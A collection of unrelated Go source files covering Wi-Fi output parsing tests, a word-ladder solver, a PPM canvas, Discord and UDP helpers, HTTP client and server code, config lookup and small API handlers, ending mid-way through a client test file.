func TestExtractBSSID(t *testing.T) {
const testStr = `Connected to 74:e5:43:10:4f:c0 (on wlan0)
SSID: PMKSACaching_4m9p5_ch1
freq: 5220
RX: 5370 bytes (37 packets)
TX: 3604 bytes (15 packets)
signal: -59 dBm
tx bitrate: 13.0 MBit/s MCS 1
bss flags: short-slot-time
dtim period: 5
beacon int: 100`
expected := "74:e5:43:10:4f:c0"
bss, err := extractBSSID(testStr)
if err != nil {
t.Errorf("unexpected error=%s", err.Error())
} else if bss != expected {
t.Errorf("got bss: %s, expect: %s", bss, expected)
}
}
func TestRegulatoryDomain(t *testing.T) {
testcases := []struct {
out string
domain string
selfManaged bool
}{
// JP.
{
out: `global
country JP: DFS-JP
(2402 - 2482 @ 40), (N/A, 20), (N/A)
(2474 - 2494 @ 20), (N/A, 20), (N/A), NO-OFDM
(4910 - 4990 @ 40), (N/A, 23), (N/A)
(5030 - 5090 @ 40), (N/A, 23), (N/A)
(5170 - 5250 @ 80), (N/A, 20), (N/A), AUTO-BW
(5250 - 5330 @ 80), (N/A, 20), (0 ms), DFS, AUTO-BW
(5490 - 5710 @ 160), (N/A, 23), (0 ms), DFS
(59000 - 66000 @ 2160), (N/A, 10), (N/A)
`,
domain: "JP",
selfManaged: false,
},
// US.
{
out: `global
country US: DFS-FCC
(2402 - 2472 @ 40), (N/A, 30), (N/A)
(5170 - 5250 @ 80), (N/A, 23), (N/A), AUTO-BW
(5250 - 5330 @ 80), (N/A, 23), (0 ms), DFS, AUTO-BW
(5490 - 5730 @ 160), (N/A, 23), (0 ms), DFS
(5735 - 5835 @ 80), (N/A, 30), (N/A)
(57240 - 71000 @ 2160), (N/A, 40), (N/A)
`,
domain: "US",
selfManaged: false,
},
// Self managed.
{
out: `global
country 00: DFS-UNSET
(2402 - 2472 @ 40), (N/A, 20), (N/A)
(2457 - 2482 @ 20), (N/A, 20), (N/A), AUTO-BW, PASSIVE-SCAN
(2474 - 2494 @ 20), (N/A, 20), (N/A), NO-OFDM, PASSIVE-SCAN
(5170 - 5250 @ 80), (N/A, 20), (N/A), AUTO-BW, PASSIVE-SCAN
(5250 - 5330 @ 80), (N/A, 20), (0 ms), DFS, AUTO-BW, PASSIVE-SCAN
(5490 - 5730 @ 160), (N/A, 20), (0 ms), DFS, PASSIVE-SCAN
(5735 - 5835 @ 80), (N/A, 20), (N/A), PASSIVE-SCAN
(57240 - 63720 @ 2160), (N/A, 0), (N/A)
phy#0 (self-managed)
country US: DFS-UNSET
(2402 - 2437 @ 40), (6, 22), (N/A), AUTO-BW, NO-HT40MINUS, NO-80MHZ, NO-160MHZ
(2422 - 2462 @ 40), (6, 22), (N/A), AUTO-BW, NO-80MHZ, NO-160MHZ
(2447 - 2482 @ 40), (6, 22), (N/A), AUTO-BW, NO-HT40PLUS, NO-80MHZ, NO-160MHZ
(5170 - 5190 @ 80), (6, 22), (N/A), NO-OUTDOOR, AUTO-BW, IR-CONCURRENT, NO-HT40MINUS, NO-160MHZ, PASSIVE-SCAN
(5190 - 5210 @ 80), (6, 22), (N/A), NO-OUTDOOR, AUTO-BW, IR-CONCURRENT, NO-HT40PLUS, NO-160MHZ, PASSIVE-SCAN
(5210 - 5230 @ 80), (6, 22), (N/A), NO-OUTDOOR, AUTO-BW, IR-CONCURRENT, NO-HT40MINUS, NO-160MHZ, PASSIVE-SCAN
(5230 - 5250 @ 80), (6, 22), (N/A), NO-OUTDOOR, AUTO-BW, IR-CONCURRENT, NO-HT40PLUS, NO-160MHZ, PASSIVE-SCAN
(5250 - 5270 @ 80), (6, 22), (0 ms), DFS, AUTO-BW, NO-HT40MINUS, NO-160MHZ, PASSIVE-SCAN
(5270 - 5290 @ 80), (6, 22), (0 ms), DFS, AUTO-BW, NO-HT40PLUS, NO-160MHZ, PASSIVE-SCAN
(5290 - 5310 @ 80), (6, 22), (0 ms), DFS, AUTO-BW, NO-HT40MINUS, NO-160MHZ, PASSIVE-SCAN
(5310 - 5330 @ 80), (6, 22), (0 ms), DFS, AUTO-BW, NO-HT40PLUS, NO-160MHZ, PASSIVE-SCAN
(5490 - 5510 @ 80), (6, 22), (0 ms), DFS, AUTO-BW, NO-HT40MINUS, NO-160MHZ, PASSIVE-SCAN
(5510 - 5530 @ 80), (6, 22), (0 ms), DFS, AUTO-BW, NO-HT40PLUS, NO-160MHZ, PASSIVE-SCAN
(5530 - 5550 @ 80), (6, 22), (0 ms), DFS, AUTO-BW, NO-HT40MINUS, NO-160MHZ, PASSIVE-SCAN
(5550 - 5570 @ 80), (6, 22), (0 ms), DFS, AUTO-BW, NO-HT40PLUS, NO-160MHZ, PASSIVE-SCAN
(5570 - 5590 @ 80), (6, 22), (0 ms), DFS, AUTO-BW, NO-HT40MINUS, NO-160MHZ, PASSIVE-SCAN
(5590 - 5610 @ 80), (6, 22), (0 ms), DFS, AUTO-BW, NO-HT40PLUS, NO-160MHZ, PASSIVE-SCAN
(5610 - 5630 @ 80), (6, 22), (0 ms), DFS, AUTO-BW, NO-HT40MINUS, NO-160MHZ, PASSIVE-SCAN
(5630 - 5650 @ 80), (6, 22), (0 ms), DFS, AUTO-BW, NO-HT40PLUS, NO-160MHZ, PASSIVE-SCAN
(5650 - 5670 @ 80), (6, 22), (0 ms), DFS, AUTO-BW, NO-HT40MINUS, NO-160MHZ, PASSIVE-SCAN
(5670 - 5690 @ 80), (6, 22), (0 ms), DFS, AUTO-BW, NO-HT40PLUS, NO-160MHZ, PASSIVE-SCAN
(5690 - 5710 @ 80), (6, 22), (0 ms), DFS, AUTO-BW, NO-HT40MINUS, NO-160MHZ, PASSIVE-SCAN
(5710 - 5730 @ 80), (6, 22), (0 ms), DFS, AUTO-BW, NO-HT40PLUS, NO-160MHZ, PASSIVE-SCAN
(5735 - 5755 @ 80), (6, 22), (N/A), AUTO-BW, IR-CONCURRENT, NO-HT40MINUS, NO-160MHZ, PASSIVE-SCAN
(5755 - 5775 @ 80), (6, 22), (N/A), AUTO-BW, IR-CONCURRENT, NO-HT40PLUS, NO-160MHZ, PASSIVE-SCAN
(5775 - 5795 @ 80), (6, 22), (N/A), AUTO-BW, IR-CONCURRENT, NO-HT40MINUS, NO-160MHZ, PASSIVE-SCAN
(5795 - 5815 @ 80), (6, 22), (N/A), AUTO-BW, IR-CONCURRENT, NO-HT40PLUS, NO-160MHZ, PASSIVE-SCAN
(5815 - 5835 @ 20), (6, 22), (N/A), AUTO-BW, IR-CONCURRENT, NO-HT40MINUS, NO-HT40PLUS, NO-80MHZ, NO-160MHZ, PASSIVE-SCAN
`,
domain: "00",
selfManaged: true,
},
}
mock := &stubCmdRunner{}
r := &Runner{cmd: mock}
for i, tc := range testcases {
mock.out = []byte(tc.out)
// Test regulatory domain.
domain, err := r.RegulatoryDomain(context.Background())
if err != nil {
t.Errorf("case#%d, unexpected error in RegulatoryDomain: %v", i, err)
} else if domain != tc.domain {
t.Errorf("case#%d, got reg domain: %s, expect: %s", i, domain, tc.domain)
}
// Test self-managed with the same output of "iw reg get".
selfManaged, err := r.IsRegulatorySelfManaged(context.Background())
if err != nil {
t.Errorf("case#%d, unexpected error in IsRegulatorySelfManaged: %v", i, err)
} else if selfManaged != tc.selfManaged {
t.Errorf("case#%d, got self managed: %t, expect: %t", i, selfManaged, tc.selfManaged)
}
}
}
|
/*
Word Ladder II
Given two words (beginWord and endWord), and a dictionary's word list, find all shortest transformation sequence(s) from beginWord to endWord, such that:
Only one letter can be changed at a time
Each transformed word must exist in the word list. Note that beginWord is not a transformed word.
For example,
Given:
beginWord = "hit"
endWord = "cog"
wordList = ["hot","dot","dog","lot","log","cog"]
Return
[
["hit","hot","dot","dog","cog"],
["hit","hot","lot","log","cog"]
]
Note:
Return an empty list if there is no such transformation sequence.
All words have the same length.
All words contain only lowercase alphabetic characters.
You may assume no duplicates in the word list.
You may assume beginWord and endWord are non-empty and are not the same.
*/
package main
// 同Problem 127, 用map存储BFS结果 DFS生成
var exist = struct{}{}
func findLadders(beginWord string, endWord string, wordList []string) [][]string {
wordSet, forward, backward := make(map[string]struct{},len(wordList)), make(map[string]struct{},1), make(map[string]struct{},1)
// 从end向begin保存相邻的节点结果
resmap := make(map[string][]string)
result := make([][]string,0)
for _,v := range wordList {
wordSet[v] = exist
resmap[v] = []string{}
}
if _,ok := wordSet[endWord];!ok {
return result
}
// 确保最短
done := false
// 标记是否翻转 放入map中是否翻转
flip := false
delete(wordSet,endWord)
forward[beginWord],backward[endWord] = exist,exist
for len(forward) > 0 {
for v := range forward {
delete(wordSet,v)
}
if len(forward) > len(backward) {
forward,backward = backward,forward
flip = !flip
}
next := make(map[string]struct{},1)
for v := range forward {
word := []byte(v)
for i := range word {
char := word[i]
for word[i] = 'a'; word[i] <= 'z'; word[i]++ {
if word[i] == char {
continue
}
s := string(word)
if _, ok := backward[s]; ok {
if flip {
resmap[v] = append(resmap[v], s)
} else {
resmap[s] = append(resmap[s], v)
}
done = true
}
if _, ok := wordSet[s]; ok {
if flip {
resmap[v] = append(resmap[v], s)
} else {
resmap[s] = append(resmap[s], v)
}
next[s] = exist
}
}
word[i] = char
}
}
forward = next
if done {
break
}
}
// dfs从map中生成所有可行解
return generate(resmap, endWord, beginWord)
}
func generate(wordSet map[string][]string, current, endWord string) [][]string {
if current == endWord {
return [][]string{{endWord}}
}
var res [][]string
for _,v := range wordSet[current] {
res = append(res,generate(wordSet, v, endWord)...)
}
for i := range res {
res[i] = append(res[i],current)
}
return res
} |
package canvas
import (
"fmt"
"math"
"strings"
"github.com/lukeshiner/raytrace/colour"
)
// Canvas holds pixel grid data
type Canvas struct {
Width, Height int
Pixels [][]colour.Colour
}
// WritePixel writes a pixel to the canvas.
func (c *Canvas) WritePixel(x, y int, colour colour.Colour) {
c.Pixels[x][y] = colour
}
// Pixel returns the colour at pixel co-ordinates (x,y).
func (c *Canvas) Pixel(x, y int) colour.Colour {
return c.Pixels[x][y]
}
// ToPPM returns the canvas as a PPM string.
func (c *Canvas) ToPPM() string {
return c.ppmHeader() + c.ppmColours()
}
func (c *Canvas) ppmHeader() string {
return fmt.Sprintf("P3\n%d %d\n255\n", c.Width, c.Height)
}
func (c *Canvas) ppmColours() string {
line := ""
colours := ""
for y := 0; y < c.Height; y++ {
for x := 0; x < c.Width; x++ {
line += ppmFormatPixel(c.Pixel(x, y)) + " "
}
line = formatPPMLine(line)
colours += line
line = ""
}
return colours
}
func formatPPMLine(line string) string {
lines := []string{line}
lines = splitLine(lines, 70)
return strings.TrimSpace(strings.Join(lines, "\n")) + "\n"
}
func splitLine(lines []string, length int) []string {
line := lines[len(lines)-1]
if len(line) > length {
index := length - 1
for line[index] != ' ' {
index--
}
lines[len(lines)-1] = line[:index]
lines = append(lines, line[index+1:])
} else {
return lines
}
return splitLine(lines, length)
}
func clampColour(c float64) int {
newC := int(math.Ceil(255 * c))
if newC >= 255 {
return 255
}
if newC <= 0 {
return 0
}
return newC
}
func ppmFormatPixel(c colour.Colour) string {
return fmt.Sprintf(
"%d %d %d", clampColour(c.Red), clampColour(c.Green), clampColour(c.Blue))
}
// New creates a new Canvas.
func New(width, height int) Canvas {
var pixels [][]colour.Colour
for x := 0; x < width; x++ {
row := []colour.Colour{}
for y := 0; y < height; y++ {
row = append(row, colour.New(0, 0, 0))
}
pixels = append(pixels, row)
}
return Canvas{width, height, pixels}
}
|
package spudo
import (
"github.com/bwmarrin/discordgo"
)
type session struct {
*discordgo.Session
logger *spudoLogger
}
func newSession(token string, logger *spudoLogger) (*session, error) {
ss := &session{}
var err error
ss.logger = logger
ss.Session, err = discordgo.New("Bot " + token)
return ss, err
}
// SendMessage is a helper function around ChannelMessageSend from
// discordgo. It will send a message to a given channel.
func (ss *session) SendMessage(channelID string, message string) {
_, err := ss.ChannelMessageSend(channelID, message)
if err != nil {
ss.logger.info("Failed to send message response -", err)
}
}
// SendEmbed is a helper function around ChannelMessageSendEmbed from
// discordgo. It will send an embed message to a given channel.
func (ss *session) SendEmbed(channelID string, embed *discordgo.MessageEmbed) {
_, err := ss.ChannelMessageSendEmbed(channelID, embed)
if err != nil {
ss.logger.error("Failed to send embed message response -", err)
}
}
func (ss *session) SendComplex(channelID string, ms *discordgo.MessageSend) {
_, err := ss.ChannelMessageSendComplex(channelID, ms)
if err != nil {
ss.logger.error("Failed to send complex message response -", err)
}
}
// AddReaction is a helper method around MessageReactionAdd from
// discordgo. It adds a reaction to a given message.
func (ss *session) AddReaction(m *discordgo.MessageCreate, reactionID string) {
if err := ss.MessageReactionAdd(m.ChannelID, m.ID, reactionID); err != nil {
ss.logger.error("Error adding reaction -", err)
}
}
|
package keba
import (
"io"
"net"
"strings"
"github.com/evcc-io/evcc/util"
)
// Sender is a KEBA UDP sender
type Sender struct {
log *util.Logger
addr string
conn *net.UDPConn
}
// NewSender creates KEBA UDP sender
func NewSender(log *util.Logger, addr string) (*Sender, error) {
addr = util.DefaultPort(addr, Port)
raddr, err := net.ResolveUDPAddr("udp", addr)
var conn *net.UDPConn
if err == nil {
conn, err = net.DialUDP("udp", nil, raddr)
}
c := &Sender{
log: log,
addr: addr,
conn: conn,
}
return c, err
}
// Send msg to receiver
func (c *Sender) Send(msg string) error {
c.log.TRACE.Printf("send to %s %v", c.addr, msg)
_, err := io.Copy(c.conn, strings.NewReader(msg))
return err
}
|
package v1
import v1 "k8s.io/api/core/v1"
type Storage struct {
// Storage class to use. If not set default will be used
StorageClass string `yaml:"storageClass,omitempty" json:"storageClass,omitempty"`
// Size. Required if persistence is enabled
Size string `yaml:"size,omitempty" json:"size,omitempty"`
}
type PodResources struct {
// +kubebuilder:validation:Optional
Replicas int `json:"replicas"`
// +kubebuilder:validation:Optional
Resources v1.ResourceRequirements `json:"resources"`
}
|
package main
import (
"net/http"
_ "github.com/mattn/go-sqlite3"
"github.com/jmoiron/sqlx"
shoe "github.com/shoelick/goserver_example"
log "github.com/sirupsen/logrus"
)
func main() {
log.SetReportCaller(true)
// init DB
db, err := sqlx.Open("sqlite3", "dummy.db")
if err != nil {
log.Fatal(err)
}
//_, err = db.Exec("read db_setup.sql")
if err != nil {
log.Fatal(err)
}
// setup db repositories
var userRepo *shoe.UserRepoSqlite3
userRepo, err = shoe.NewUserRepoSqlite3(db)
if err != nil {
log.Fatal(err)
}
var sessionRepo *shoe.SessionRepoSqlite3
sessionRepo, err = shoe.NewSessionRepoSqlite3(db)
if err != nil {
log.Fatal(err)
}
// setup server and go
s := shoe.NewServer(userRepo, sessionRepo)
log.Info("Server start")
http.Handle("/", s)
err = http.ListenAndServeTLS(":443", "server.crt", "server.key", nil)
if err != nil {
log.Fatal("ListenAndServe: ", err)
}
}
|
// Copyright 2016 Marc-Antoine Ruel. All rights reserved.
// Use of this source code is governed under the Apache License, Version 2.0
// that can be found in the LICENSE file.
package main
import (
"syscall"
"unsafe"
)
// SetConsoleTitle sets the console title.
func SetConsoleTitle(title string) error {
h, err := syscall.LoadLibrary("kernel32.dll")
if err != nil {
return err
}
defer syscall.FreeLibrary(h)
p, err := syscall.GetProcAddress(h, "SetConsoleTitleW")
if err != nil {
return err
}
s, err := syscall.UTF16PtrFromString(title)
if err != nil {
return err
}
_, _, errno := syscall.Syscall(p, 1, uintptr(unsafe.Pointer(s)), 0, 0)
return syscall.Errno(errno)
}
|
package web
import (
"fmt"
"net/http"
)
func init() {
http.HandleFunc("/", root)
}
func root(w http.ResponseWriter, r *http.Request) {
fmt.Fprint(w, "Hello, world!\n")
}
|
package memory
import (
"fmt"
color "github.com/fatih/color"
tablewriter "github.com/olekukonko/tablewriter"
"os"
"strconv"
"sync"
)
type DataMemory struct {
sync.RWMutex
Memory []int32
}
var registers, buffer [32]int64
var flagNegative, flagZero, flagOverflow, flagCarry bool
// InitRegisters is a function to initiate register values.
func InitRegisters() {
registers[XZR] = 0
registers[SP] = MEMORY_SIZE * 4
}
// SaveRegisters is a function to store register values in a buffer.
func SaveRegisters() {
var i int
for i = 0; i < 32; i++ {
buffer[i] = registers[i]
}
}
// ShowRegisters is a function to pretty print register values to terminal.
func ShowRegisters(showAll bool) {
var i int
var hasUpdated bool = false
var registerNum, prevRegisterVal, newRegisterVal string
table := tablewriter.NewWriter(os.Stdout)
if showAll == true {
hasUpdated = true
table.SetHeader([]string{"Register", "Value"})
for i = 0; i < 32; i++ {
registerNum = strconv.Itoa(i)
newRegisterVal = strconv.FormatInt(getRegisterValue(uint(i)), 10)
if getRegisterValue(uint(i)) != buffer[i] {
table.Append([]string{color.CyanString("R" + registerNum), color.CyanString(newRegisterVal)})
} else {
table.Append([]string{"R" + registerNum, newRegisterVal})
}
}
} else {
table.SetHeader([]string{"Register", "Previous Value", "New Value"})
for i = 0; i < 32; i++ {
if getRegisterValue(uint(i)) != buffer[i] {
hasUpdated = true
registerNum = strconv.Itoa(i)
prevRegisterVal = strconv.FormatInt(buffer[i], 10)
newRegisterVal = strconv.FormatInt(getRegisterValue(uint(i)), 10)
table.Append([]string{color.CyanString("R" + registerNum), color.RedString(prevRegisterVal), color.GreenString(newRegisterVal)})
}
}
}
if hasUpdated {
table.Render()
fmt.Printf("\n")
}
}
// Method to read data from memory.
// Guarantees mutually exclusive access.
func (dataMemory *DataMemory) read(address uint64) int32 {
dataMemory.RLock()
value := dataMemory.Memory[address]
dataMemory.RUnlock()
return value
}
// Method to write data to memory.
// Guarantees mutually exclusive access.
func (dataMemory *DataMemory) write(address uint64, value int32) {
dataMemory.Lock()
dataMemory.Memory[address] = value
dataMemory.Unlock()
}
// Function to read from register and return its value.
func getRegisterValue(registerIndex uint) int64 {
return registers[registerIndex]
}
// Function to write to register.
func setRegisterValue(registerIndex uint, value int64) {
registers[registerIndex] = value
}
|
package main
import (
. "github.com/onsi/ginkgo"
. "github.com/onsi/gomega"
"github.com/onsi/gomega/gbytes"
. "github.com/onsi/gomega/gstruct"
"code.cloudfoundry.org/lager"
"github.com/jarcoal/httpmock"
m "github.com/alphagov/paas-cf/tools/metrics/pkg/metrics"
)
var _ = Describe("Currency", func() {
logger := lager.NewLogger("currency")
logger.RegisterSink(lager.NewWriterSink(gbytes.NewBuffer(), lager.INFO))
BeforeEach(func() {
httpmock.Activate()
})
AfterEach(func() {
httpmock.DeactivateAndReset()
})
Context("European Central Bank API", func() {
It("Should gracefully return an error when the request is bad", func() {
httpmock.RegisterResponder(
"GET", `=~^https://api.exchangeratesapi.io/latest\z`,
httpmock.NewStringResponder(400, ``),
)
rate, err := getCurrencyFromECB("USD", "BADCURRENCY")
Expect(httpmock.GetTotalCallCount()).To(BeNumerically("==", 1))
Expect(err).To(HaveOccurred())
Expect(err).To(MatchError(ContainSubstring(
"Did not receive HTTP 200 OK",
)))
Expect(rate).To(BeNumerically("==", 0))
})
})
It("Should gracefully return an error when the response is bad", func() {
httpmock.RegisterResponder(
"GET", `=~^https://api.exchangeratesapi.io/latest\z`,
httpmock.NewStringResponder(200, `{not-well-formatted-json}`),
)
rate, err := getCurrencyFromECB("USD", "GBP")
Expect(httpmock.GetTotalCallCount()).To(BeNumerically("==", 1))
Expect(err).To(HaveOccurred())
Expect(err).To(MatchError(ContainSubstring(
"Could not unmarshal response from ECB",
)))
Expect(rate).To(BeNumerically("==", 0))
})
It("Should gracefully return an error when the target is not found", func() {
httpmock.RegisterResponder(
"GET", `=~^https://api.exchangeratesapi.io/latest\z`,
httpmock.NewStringResponder(200, `{"rates": {}}`),
)
rate, err := getCurrencyFromECB("USD", "GBP")
Expect(httpmock.GetTotalCallCount()).To(BeNumerically("==", 1))
Expect(err).To(HaveOccurred())
Expect(err).To(MatchError(ContainSubstring(
"Could not find target",
)))
Expect(rate).To(BeNumerically("==", 0))
})
It("Should return the rate correctly", func() {
httpmock.RegisterResponder(
"GET", `=~^https://api.exchangeratesapi.io/latest\z`,
httpmock.NewStringResponder(200, `{"rates": {"GBP": 0.8}}`),
)
rate, err := getCurrencyFromECB("USD", "GBP")
Expect(httpmock.GetTotalCallCount()).To(BeNumerically("==", 1))
Expect(err).NotTo(HaveOccurred())
Expect(rate).To(BeNumerically("==", 0.8))
})
Context("CurrencyMetricGauges", func() {
It("Should handle errors gracefully", func() {
httpmock.RegisterResponder(
"GET", `=~^https://api.exchangeratesapi.io/latest\z`,
httpmock.NewStringResponder(404, ``),
)
_, err := CurrencyMetricGauges(logger)
Expect(httpmock.GetTotalCallCount()).To(BeNumerically("==", 1))
Expect(err).To(HaveOccurred())
Expect(err).To(MatchError(ContainSubstring(
"Did not receive HTTP 200 OK",
)))
})
It("Should return the configured and the live value correctly", func() {
httpmock.RegisterResponder(
"GET", `=~^https://api.exchangeratesapi.io/latest\z`,
httpmock.NewStringResponder(200, `{"rates": {"GBP": 0.8}}`),
)
metrics, err := CurrencyMetricGauges(logger)
Expect(httpmock.GetTotalCallCount()).To(BeNumerically("==", 1))
Expect(err).NotTo(HaveOccurred())
Expect(metrics).To(HaveLen(1))
Expect(metrics).To(ContainElement(MatchFields(IgnoreExtras, Fields{
"Name": Equal("currency.real"),
"Unit": Equal("ratio"),
"Kind": Equal(m.Gauge),
"Value": BeNumerically("==", 0.8),
"Tags": ContainElement(MatchFields(IgnoreExtras, Fields{
"Label": Equal("code"), "Value": Equal("USD"),
})),
})))
})
})
})
|
package internal
import (
"crypto/tls"
"io/ioutil"
"net"
"net/http"
"time"
"github.com/goodmustache/pt/tracker/terror"
)
// ConnectionConfig is for configuring a TrackerConnection.
type ConnectionConfig struct {
SkipSSLValidation bool
}
// TrackerConnection represents a connection to the Cloud Controller
// server.
type TrackerConnection struct {
HTTPClient *http.Client
UserAgent string
}
// NewTrackerConnection returns a new TrackerConnection with provided
// configuration.
func NewTrackerConnection(config ConnectionConfig) *TrackerConnection {
tr := &http.Transport{
TLSClientConfig: &tls.Config{
InsecureSkipVerify: config.SkipSSLValidation,
},
Proxy: http.ProxyFromEnvironment,
DialContext: (&net.Dialer{
KeepAlive: 30 * time.Second,
Timeout: 5 * time.Second,
}).DialContext,
}
return &TrackerConnection{
HTTPClient: &http.Client{Transport: tr},
}
}
// Make performs the request and parses the response.
func (connection *TrackerConnection) Make(request *Request, passedResponse *Response) error {
// In case this function is called from a retry, passedResponse may already
// be populated with a previous response. We reset in case there's an HTTP
// error and we don't repopulate it in populateResponse.
passedResponse.reset()
response, err := connection.HTTPClient.Do(request.Request)
if err != nil {
return err
}
return connection.populateResponse(response, passedResponse)
}
func (*TrackerConnection) handleStatusCodes(response *http.Response, passedResponse *Response) error {
if response.StatusCode == http.StatusNoContent {
passedResponse.RawResponse = []byte("{}")
} else {
rawBytes, err := ioutil.ReadAll(response.Body)
defer response.Body.Close()
if err != nil {
return err
}
passedResponse.RawResponse = rawBytes
}
if response.StatusCode >= 400 {
return terror.RawHTTPStatusError{
StatusCode: response.StatusCode,
RawResponse: passedResponse.RawResponse,
RequestIDs: response.Header[http.CanonicalHeaderKey("x-request-id")],
}
}
return nil
}
func (connection *TrackerConnection) populateResponse(response *http.Response, passedResponse *Response) error {
passedResponse.HTTPResponse = response
if resourceLocationURL := response.Header.Get("Location"); resourceLocationURL != "" {
passedResponse.ResourceLocationURL = resourceLocationURL
}
err := connection.handleStatusCodes(response, passedResponse)
if err != nil {
return err
}
if passedResponse.DecodeJSONResponseInto != nil {
err = DecodeJSON(passedResponse.RawResponse, passedResponse.DecodeJSONResponseInto)
if err != nil {
return err
}
}
return nil
}
|
package config
import (
"fmt"
"io/ioutil"
"os"
homedir "github.com/mitchellh/go-homedir"
)
// Source contains information about configuration source file
type Source struct {
FileName string // File name of configuration file. Can be without extension
FileNames []string // Aliases for configuration files
Subfolder string // Subfolder name
SkipValidation bool // Disable automatic validation for structs with Validate method
LookupHome bool // If true, module will make attempt to find config inside user home folder
LookupEtc bool // If true, module will make attempt to find config in /etc/
OnAfterRead func(interface{}) error // Callback invoked after read and before validation
}
// GetAllFileNames returns all file names for configuration files
func (s Source) GetAllFileNames() []string {
var total []string
if len(s.FileName) > 0 {
total = append(total, expandName(s.FileName)...)
}
for _, f := range s.FileNames {
if len(f) > 0 {
total = append(total, expandName(f)...)
}
}
return total
}
// GetAllFolders returns all folders to lookup for configuration files
func (s Source) GetAllFolders() []string {
total := []string{"."}
hasSubfolder := len(s.Subfolder) > 0
if hasSubfolder {
total = append(total, "."+string(os.PathSeparator)+s.Subfolder+string(os.PathSeparator))
}
if s.LookupHome {
if home, err := homedir.Dir(); err == nil {
total = append(total, home)
}
}
if s.LookupEtc && os.PathSeparator == '/' {
if hasSubfolder {
total = append(total, "/etc/"+s.Subfolder+"/")
} else {
total = append(total, "/etc/")
}
}
return total
}
// GetAllPaths returns all file paths
func (s Source) GetAllPaths() []string {
var total []string
for _, p := range s.GetAllFolders() {
for _, f := range s.GetAllFileNames() {
total = append(total, pathConcat(p, f))
}
}
return total
}
// Find searches for existing file
func (s Source) Find() (string, bool) {
for _, p := range s.GetAllPaths() {
if _, err := os.Stat(p); err == nil {
return p, true
}
}
return "", false
}
// Read method reads configuration from file
func (s Source) Read(target interface{}) error {
f, ok := s.Find()
if !ok {
return LocateAndReadError{
Paths: s.GetAllPaths(),
Cause: "no configuration file found",
}
}
// Reading all bytes
bts, err := ioutil.ReadFile(f)
if err != nil {
return fmt.Errorf(
`unable to read configuration file "%s" - %s`,
f, err.Error(),
)
}
err = readBytes(f, bts, target)
if err != nil {
return err
}
if s.OnAfterRead != nil {
if err = s.OnAfterRead(target); err != nil {
return err
}
}
if !s.SkipValidation {
if v, ok := target.(validable); ok {
err = v.Validate()
if err != nil {
err = MarshalError{Cause: err.Error(), FileName: f, Struct: target}
}
}
}
return err
}
type validable interface {
Validate() error
}
|
package routers
import (
"festival/app/common/middleware/auth"
"festival/app/common/router"
"festival/app/controller/module"
)
// 微信用户
// power by 7be.cn
func init() {
g2 := router.New("admin", "/admin/module", auth.Auth)
g2.GET("/members", true, module.ModMemberList)
g2.GET("/member/edit", true, module.ModMemberEdit)
g2.POST("/member/save", true, module.ModMemberSave)
g2.POST("/member/del", true, module.ModMemberDel)
}
|
package view
import (
proj_model "github.com/caos/zitadel/internal/project/model"
"github.com/caos/zitadel/internal/project/repository/view"
"github.com/caos/zitadel/internal/project/repository/view/model"
"github.com/caos/zitadel/internal/view/repository"
)
const (
projectRoleTable = "management.project_roles"
)
func (v *View) ProjectRoleByIDs(projectID, orgID, key string) (*model.ProjectRoleView, error) {
return view.ProjectRoleByIDs(v.Db, projectRoleTable, projectID, orgID, key)
}
func (v *View) ResourceOwnerProjectRolesByKey(projectID, resourceowner, key string) ([]*model.ProjectRoleView, error) {
return view.ResourceOwnerProjectRolesByKey(v.Db, projectRoleTable, projectID, resourceowner, key)
}
func (v *View) ResourceOwnerProjectRoles(projectID, resourceowner string) ([]*model.ProjectRoleView, error) {
return view.ResourceOwnerProjectRoles(v.Db, projectRoleTable, projectID, resourceowner)
}
func (v *View) SearchProjectRoles(request *proj_model.ProjectRoleSearchRequest) ([]*model.ProjectRoleView, int, error) {
return view.SearchProjectRoles(v.Db, projectRoleTable, request)
}
func (v *View) PutProjectRole(project *model.ProjectRoleView) error {
err := view.PutProjectRole(v.Db, projectRoleTable, project)
if err != nil {
return err
}
return v.ProcessedProjectRoleSequence(project.Sequence)
}
func (v *View) DeleteProjectRole(projectID, orgID, key string, eventSequence uint64) error {
err := view.DeleteProjectRole(v.Db, projectRoleTable, projectID, orgID, key)
if err != nil {
return nil
}
return v.ProcessedProjectRoleSequence(eventSequence)
}
func (v *View) GetLatestProjectRoleSequence() (*repository.CurrentSequence, error) {
return v.latestSequence(projectRoleTable)
}
func (v *View) ProcessedProjectRoleSequence(eventSequence uint64) error {
return v.saveCurrentSequence(projectRoleTable, eventSequence)
}
func (v *View) GetLatestProjectRoleFailedEvent(sequence uint64) (*repository.FailedEvent, error) {
return v.latestFailedEvent(projectRoleTable, sequence)
}
func (v *View) ProcessedProjectRoleFailedEvent(failedEvent *repository.FailedEvent) error {
return v.saveFailedEvent(failedEvent)
}
|
package api
import (
"encoding/json"
"net/http"
"github.com/kevguy/My-Shitty-Music-Backend/models"
"github.com/kevguy/My-Shitty-Music-Backend/util"
)
// DeleteSongEndPoint deletes a song
func DeleteSongEndPoint(w http.ResponseWriter, r *http.Request) {
defer r.Body.Close()
var song models.Song
if err := json.NewDecoder(r.Body).Decode(&song); err != nil {
util.RespondWithError(w, http.StatusBadRequest, "Invalid request payload")
return
}
if err := shittyMusicDao.DeleteSong(song); err != nil {
util.RespondWithError(w, http.StatusInternalServerError, err.Error())
return
}
util.RespondWithJSON(w, http.StatusOK, map[string]string{"result": "success"})
}
|
package display
import (
"strings"
"testing"
"github.com/AnuchitPrasertsang/roshambo/decide"
)
var titleLength = 26
func assertMePosition(title string, t *testing.T) {
m := strings.Index(title, "me")
if m != 4 {
t.Error("me should be at position 4 but got ", m)
}
}
func assertComputerPosition(title string, p int, t *testing.T) {
c := strings.Index(title, "computer")
if c != p {
t.Error("computer should be at position ", p, " but got ", c)
}
}
func TestTitleShouldBeFixLenghtWhenWIN(t *testing.T) {
title := Title(decide.WIN)
assertMePosition(title, t)
assertComputerPosition(title, 17, t)
}
func TestTitleShouldBeFixLenghtWhenLOSS(t *testing.T) {
title := Title(decide.LOSS)
assertMePosition(title, t)
assertComputerPosition(title, 18, t)
}
func TestTitleShouldBeFixLenghtWhenTIE(t *testing.T) {
title := Title(decide.TIE)
assertMePosition(title, t)
assertComputerPosition(title, 19, t)
}
|
// Copyright (c) 2018, Sylabs Inc. All rights reserved.
// This software is licensed under a 3-clause BSD license. Please consult the
// LICENSE.md file distributed with the sources of this project regarding your
// rights to use or distribute this software.
package client
import (
"context"
"net/http"
"reflect"
"testing"
jsonresp "github.com/sylabs/json-resp"
)
func Test_Search(t *testing.T) {
tests := []struct {
description string
code int
body interface{}
reqCallback func(*http.Request, *testing.T)
